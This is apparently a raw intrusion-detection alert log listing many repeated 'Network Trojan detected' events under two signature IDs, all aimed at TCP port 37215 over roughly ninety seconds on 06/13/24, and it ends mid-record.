              SID:2835222
              Source Port:41102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076225
              SID:2835222
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911410
              SID:2829579
              Source Port:59416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751255
              SID:2835222
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241838
              SID:2829579
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217391
              SID:2829579
              Source Port:41588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096724
              SID:2835222
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420815
              SID:2829579
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841203
              SID:2835222
              Source Port:34446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156323
              SID:2835222
              Source Port:49612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158450
              SID:2835222
              Source Port:57438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155114
              SID:2829579
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011059
              SID:2835222
              Source Port:41340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026404
              SID:2829579
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528395
              SID:2829579
              Source Port:45418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269367
              SID:2835222
              Source Port:49000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136115
              SID:2835222
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503530
              SID:2829579
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419267
              SID:2835222
              Source Port:50016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551376
              SID:2835222
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677895
              SID:2835222
              Source Port:33638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631014
              SID:2829579
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321593
              SID:2835222
              Source Port:48796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075531
              SID:2835222
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262980
              SID:2829579
              Source Port:35260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458282
              SID:2835222
              Source Port:51994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607833
              SID:2829579
              Source Port:52646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055747
              SID:2829579
              Source Port:53820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726651
              SID:2835222
              Source Port:54750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970977
              SID:2829579
              Source Port:58182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175204
              SID:2829579
              Source Port:59406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693995
              SID:2829579
              Source Port:54116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804575
              SID:2835222
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155970
              SID:2829579
              Source Port:54178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111430
              SID:2835222
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125150
              SID:2835222
              Source Port:53136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993371
              SID:2829579
              Source Port:56366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458433
              SID:2829579
              Source Port:35394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195257
              SID:2829579
              Source Port:53198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214445
              SID:2835222
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553136
              SID:2835222
              Source Port:39786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194395
              SID:2829579
              Source Port:37874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726692
              SID:2829579
              Source Port:41848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634245
              SID:2829579
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012158
              SID:2835222
              Source Port:36434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729599
              SID:2835222
              Source Port:48382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478554
              SID:2835222
              Source Port:38782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633024
              SID:2829579
              Source Port:37806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420215
              SID:2829579
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055445
              SID:2835222
              Source Port:45400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093021
              SID:2829579
              Source Port:41864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403543
              SID:2829579
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302076
              SID:2835222
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215806
              SID:2835222
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262323
              SID:2829579
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262268
              SID:2835222
              Source Port:32990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373238
              SID:2835222
              Source Port:34310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945778
              SID:2829579
              Source Port:47374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785303
              SID:2829579
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406399
              SID:2829579
              Source Port:40606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212803
              SID:2829579
              Source Port:52442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303864
              SID:2835222
              Source Port:33160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316139
              SID:2829579
              Source Port:46736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989249
              SID:2829579
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725998
              SID:2835222
              Source Port:49692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048758
              SID:2829579
              Source Port:44850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097683
              SID:2835222
              Source Port:41102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085772
              SID:2829579
              Source Port:48942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422694
              SID:2835222
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676697
              SID:2829579
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803959
              SID:2835222
              Source Port:46434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555062
              SID:2835222
              Source Port:53540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263248
              SID:2829579
              Source Port:33936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658286
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708028
              SID:2835222
              Source Port:36794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279737
              SID:2829579
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453025
              SID:2829579
              Source Port:53348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783515
              SID:2829579
              Source Port:50654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273305
              SID:2835222
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485738
              SID:2829579
              Source Port:53440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305686
              SID:2835222
              Source Port:60600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023729
              SID:2829579
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672572
              SID:2829579
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631055
              SID:2829579
              Source Port:54916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824272
              SID:2835222
              Source Port:50796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783374
              SID:2829579
              Source Port:53046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221809
              SID:2829579
              Source Port:55196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299264
              SID:2835222
              Source Port:47942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345186
              SID:2829579
              Source Port:51276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238778
              SID:2829579
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306772
              SID:2835222
              Source Port:56620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657854
              SID:2829579
              Source Port:59452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954813
              SID:2835222
              Source Port:50586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438139
              SID:2835222
              Source Port:46678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175155
              SID:2829579
              Source Port:40222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240389
              SID:2835222
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609492
              SID:2835222
              Source Port:60594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060258
              SID:2835222
              Source Port:38116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124652
              SID:2835222
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993825
              SID:2829579
              Source Port:50164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265034
              SID:2829579
              Source Port:37820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605886
              SID:2829579
              Source Port:57068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475896
              SID:2829579
              Source Port:46222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656211
              SID:2835222
              Source Port:51386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710174
              SID:2829579
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247515
              SID:2829579
              Source Port:37150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450412
              SID:2835222
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013100
              SID:2835222
              Source Port:35522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308540
              SID:2835222
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025884
              SID:2829579
              Source Port:51742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075211
              SID:2829579
              Source Port:44348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912258
              SID:2829579
              Source Port:34990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836302
              SID:2835222
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912958
              SID:2829579
              Source Port:60266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098751
              SID:2829579
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017219
              SID:2829579
              Source Port:50994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932606
              SID:2835222
              Source Port:57962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485276
              SID:2829579
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077205
              SID:2835222
              Source Port:60770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222891
              SID:2835222
              Source Port:51224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502412
              SID:2835222
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241021
              SID:2835222
              Source Port:57794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456638
              SID:2829579
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708541
              SID:2835222
              Source Port:51314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550169
              SID:2835222
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710678
              SID:2829579
              Source Port:53096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754526
              SID:2835222
              Source Port:33094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527762
              SID:2835222
              Source Port:58358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275874
              SID:2835222
              Source Port:59534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708852
              SID:2835222
              Source Port:57056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886422
              SID:2835222
              Source Port:60840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709982
              SID:2829579
              Source Port:48176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377813
              SID:2829579
              Source Port:49128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112448
              SID:2835222
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786256
              SID:2835222
              Source Port:44142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970065
              SID:2835222
              Source Port:56316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555666
              SID:2835222
              Source Port:48296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407388
              SID:2829579
              Source Port:43686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609976
              SID:2829579
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274331
              SID:2835222
              Source Port:60942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996053
              SID:2835222
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508818
              SID:2829579
              Source Port:55942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416939
              SID:2835222
              Source Port:47712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191939
              SID:2835222
              Source Port:56796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439993
              SID:2835222
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220569
              SID:2829579
              Source Port:60268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356208
              SID:2829579
              Source Port:42020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679390
              SID:2835222
              Source Port:40438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730329
              SID:2835222
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839246
              SID:2835222
              Source Port:60964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045562
              SID:2829579
              Source Port:51488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156742
              SID:2835222
              Source Port:51510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300652
              SID:2829579
              Source Port:37314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823627
              SID:2835222
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161007
              SID:2829579
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269646
              SID:2829579
              Source Port:37788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954047
              SID:2835222
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756804
              SID:2829579
              Source Port:48092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213046
              SID:2829579
              Source Port:43778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453198
              SID:2835222
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996911
              SID:2829579
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604098
              SID:2829579
              Source Port:38322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196806
              SID:2835222
              Source Port:43650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155437
              SID:2835222
              Source Port:35684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305507
              SID:2835222
              Source Port:40042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109779
              SID:2835222
              Source Port:48484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271879
              SID:2829579
              Source Port:42164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402727
              SID:2835222
              Source Port:55574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125627
              SID:2829579
              Source Port:37254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634588
              SID:2829579
              Source Port:53128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638269
              SID:2829579
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123693
              SID:2829579
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568053
              SID:2835222
              Source Port:46956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154620
              SID:2835222
              Source Port:38790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784220
              SID:2829579
              Source Port:46996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436290
              SID:2829579
              Source Port:53788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485998
              SID:2829579
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696947
              SID:2829579
              Source Port:42250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318491
              SID:2829579
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212403
              SID:2835222
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910306
              SID:2835222
              Source Port:38082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784100
              SID:2829579
              Source Port:33248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211355
              SID:2829579
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275070
              SID:2835222
              Source Port:56280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137140
              SID:2829579
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527679
              SID:2835222
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100531
              SID:2829579
              Source Port:57172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977938
              SID:2835222
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269746
              SID:2829579
              Source Port:48782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780663
              SID:2829579
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941392
              SID:2829579
              Source Port:42174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450935
              SID:2829579
              Source Port:41052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307175
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130334
              SID:2829579
              Source Port:38030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933012
              SID:2835222
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697353
              SID:2835222
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191342
              SID:2829579
              Source Port:39274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612643
              SID:2835222
              Source Port:37172
              Destination Port:37215
